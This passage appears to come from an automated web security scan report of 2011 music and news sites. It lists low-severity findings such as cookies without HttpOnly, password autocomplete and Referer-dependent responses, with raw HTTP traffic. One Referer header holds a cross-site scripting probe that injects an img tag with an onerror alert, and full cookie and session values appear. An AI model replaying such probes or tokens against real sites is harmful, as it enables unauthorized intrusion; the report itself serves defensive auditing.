The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3qCOBQmN0yUv6WrF--lZoc3dRfuweNq9qe4Bp0O5v0HfEOi0vh6R2kg

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:59 GMT
Connection: close
Set-Cookie: /BC3=.P_d.; path=/
Set-Cookie: /SO=:201:; path=/
Set-Cookie: /PC=0; path=/; expires=Mon, 16-May-2011 14:00:59 GMT
Set-Cookie: /SC=0-2vc.1; path=/
Content-Length: 1393


document.write('<IFR'+'AME SRC="http://ad.doubleclick.net/adi/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI
...[SNIP]...

10.130. http://www.burstnet.com/enlightn/7578//12A4/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/7578//12A4/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enlightn/7578//12A4/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3qCOBQmN0yUv6WrF--lZoc3dRfuweNq9qe4Bp0O5v0HfEOi0vh6R2kg; /BC3=.P_d.; /SO=:201:; /PC=0; /SC=0-2vc.1

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Mon, 09 May 2011 14:01:03 GMT
Content-Length: 43
Connection: close
Set-Cookie: TID=16sfssv0tfhb31; path=/; expires=Sun, 07-Aug-2011 14:01:03 GMT; domain=.burstnet.com
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=16g.1Elg; path=/; expires=Wed, 09-May-2012 14:01:03 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

10.131. http://www.ccnow.com/cgi-local/cart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccnow.com
Path:   /cgi-local/cart.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-local/cart.cgi?2akrshop2_AKR074VINYL HTTP/1.1
Host: www.ccnow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.5.10.1304949980; oudelay=1304950305; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206;

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:12:25 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950348; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:12:28 GMT
Set-Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75AC132BC7478C7307DEBD3D97FA4A6E72CA22BF32FAF94F13; domain=www.ccnow.com; path=/; expires=Wed, 08-May-2013 14:12:28 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...

10.132. http://www.ccnow.com/cgi-local/sc_cart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccnow.com
Path:   /cgi-local/sc_cart.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-local/sc_cart.cgi?8147444662139294 HTTP/1.1
Host: www.ccnow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:30 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950050; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:30 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...

10.133. https://www.ccnow.com/cgi-local/cart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/cart.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: oudelay, ccnowcart (see the Set-Cookie headers in the response below).

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-local/cart.cgi?asmakit_AKR214_http://asthmatickitty.com/ HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949962

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:44 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950065; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:45 GMT
Set-Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75D81F41DED68942DF4467139B51A38206; domain=www.ccnow.com; path=/; expires=Wed, 08-May-2013 14:07:45 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...

10.134. https://www.ccnow.com/cgi-local/checkout.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/checkout.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: oudelay (see the Set-Cookie header in the response below).

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /cgi-local/checkout.cgi HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/sc_cart.cgi
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oudelay=1304950012; __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.3.10.1304949980
Content-Length: 287

action=main&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=US&cids=asmakit&ftotal=1000%2C200%2C0%2C0&gtotal=1200&invoice=0&items=1&platflag=0&platform=Productio
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:52 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950072; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:52 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18997

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...

10.135. https://www.ccnow.com/cgi-local/sc_cart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/sc_cart.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: oudelay (see the Set-Cookie header in the response below).

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /cgi-local/sc_cart.cgi HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/cart.cgi?asmakit_AKR214_http://asthmatickitty.com/
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949975; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.1.10.1304949980
Content-Length: 365

seq1_asmakit_pid=AKR214&seq1_asmakit_quan=1&coupon_asmakit=&shipreg_asmakit=BC%3AUS&action=update&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=ZZ&cids=asmakit
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:50 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950070; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:50 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14414

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...

11. Password field with autocomplete enabled
There are 5 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


11.1. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The page contains a form with the following action URL: /news/sufjan-stevens-suffered-nervous-breakdown?destination=login_redirect

The form contains the following password field with autocomplete enabled: pass

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=47u27u5frb149p678dd9853b46; expires=Wed, 01-Jun-2011 17:33:50 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:00:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="content">
<form action="/news/sufjan-stevens-suffered-nervous-breakdown?destination=login_redirect" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" tabindex="2" class="form-text required" />
</div>
...[SNIP]...

11.2. http://www.clashmusic.com/user/a

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The page contains a form with the following action URL: /user/a?destination=login_redirect

The form contains the following password field with autocomplete enabled: pass

Request

GET /user/a HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:13:42 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:13:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<!-- CONTENT AREA -->
                   
                    <form action="/user/a?destination=login_redirect" accept-charset="UTF-8" method="post" id="user-login">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" size="60" tabindex="2" class="form-text required" />
<div class="description">
...[SNIP]...

11.3. http://www.floridatoday.com/odygel/lib/userauth/content/login.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/login.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled: Password

Request

GET /odygel/lib/userauth/content/login.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 15 Nov 2010 22:45:32 GMT
Accept-Ranges: bytes
ETag: "08e11cf1685cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 2828

   <div class="ody-login-box clearfix">
       <a><div id="ody-login-close" class="ody-close"></div></a>
       <div class="ody-title">Log In<span class="ody-orsignup" id="ody-login-signup" >or&nbsp;<a>Sign Up<
...[SNIP]...
</div>
       <form id="ody-login-form" onsubmit="return false">
       <div class="ody-fields">
...[SNIP]...
<div class="ody-f-i"><input type="password" id="Password" name="Password" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Login.Click, 13);" style="width: 200px" />
                   </div>
...[SNIP]...

11.4. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/signup.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled: Password, ConfirmPassword

Request

GET /odygel/lib/userauth/content/signup.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 17 Nov 2010 21:52:00 GMT
Accept-Ranges: bytes
ETag: "0c064a9a186cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 7620

   <div class="ody-pa-box ody-su-box clearfix">
       <a><div id="ody-signup-close" class="ody-close"></div></a>
       <div class="ody-title">Sign Up<span class="ody-orlogin" id="ody-signup-login">or <a>Log i
...[SNIP]...
</div>
           <form id="UAWidget-Registration" name="UAWidget-Registration" onsubmit="return false">
           <div id="ody-signup-main" class="ody-noerrors">
...[SNIP]...
<div class="ody-f-i"><input type="password" id="Password" name="Password" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Registration.RegistrationClick, 13);" size="30" /></div>
...[SNIP]...
<div class="ody-f-i"><input type="password" id="ConfirmPassword" name="ConfirmPassword" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Registration.RegistrationClick, 13);" size="30" /></div>
...[SNIP]...

11.5. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thevine.com.au
Path:   /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Issue detail

The page contains a form with the following action URL: ../../content/detail.aspx?id=23458

The form contains the following password field with autocomplete enabled: ctl00$HeaderNavigationControl$ctl00$Login1$Password

Request

GET /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx HTTP/1.1
Host: www.thevine.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kxuwnfahnyntrb45nyzhom55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 269864


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<!--googleoff: index-->


<form name="aspnetForm" method="post" action="../../content/detail.aspx?id=23458" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td class="input"><input name="ctl00$HeaderNavigationControl$ctl00$Login1$Password" type="password" id="ctl00_HeaderNavigationControl_ctl00_Login1_Password" style="width:128px;" /></td>
...[SNIP]...

12. Referer-dependent response
There are 10 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.



12.1. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.burst/B5229711.3

Request 1

GET /adi/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI1r/K=ADS_T200/SZ=300X250A/V=2.3S//REDIRURL=;ord=14656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 09 May 2011 14:01:21 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 7033

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated
...[SNIP]...
"http://s1.2mdn.net/998766/1052_300x250_Promo_FreeGalaxyS_Android_Static.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BKS8xsfPHTdDJFsmV6Aarm5ivBAAAAAAQASAAOABQu-inzvj_____AVjRkYYUYMmGhYmIpIQQggEJY2EtZ29vZ2xlsgELd3d3Lm5tZS5jb23IAQnaASxodHRwOi8vd3d3Lm5tZS5jb20vbmV3cy9zdWZqYW4tc3RldmVucy81NjUyN8ACAqgDAdgEgK3iBOAEApoFFwjRgBQQ1_GqHhjgweBwINGRhhQo7vo82gUCCAA&num=0&sig=AGiWqtwvP3w2Vn-spxO7hgEDexBlPgen5A&client=&adurl=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS%3D2iU9W.LI1r/K%3DADS_T200/SZ%3D300X250A/V%3D2.3S//REDIRURL%3Dhttp://www.t-mobile.com/shop/phones/default.aspx%3Fmanufacturer%3D9c43c518-8abb-453d-a0cd-8b7e912ff3fe");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


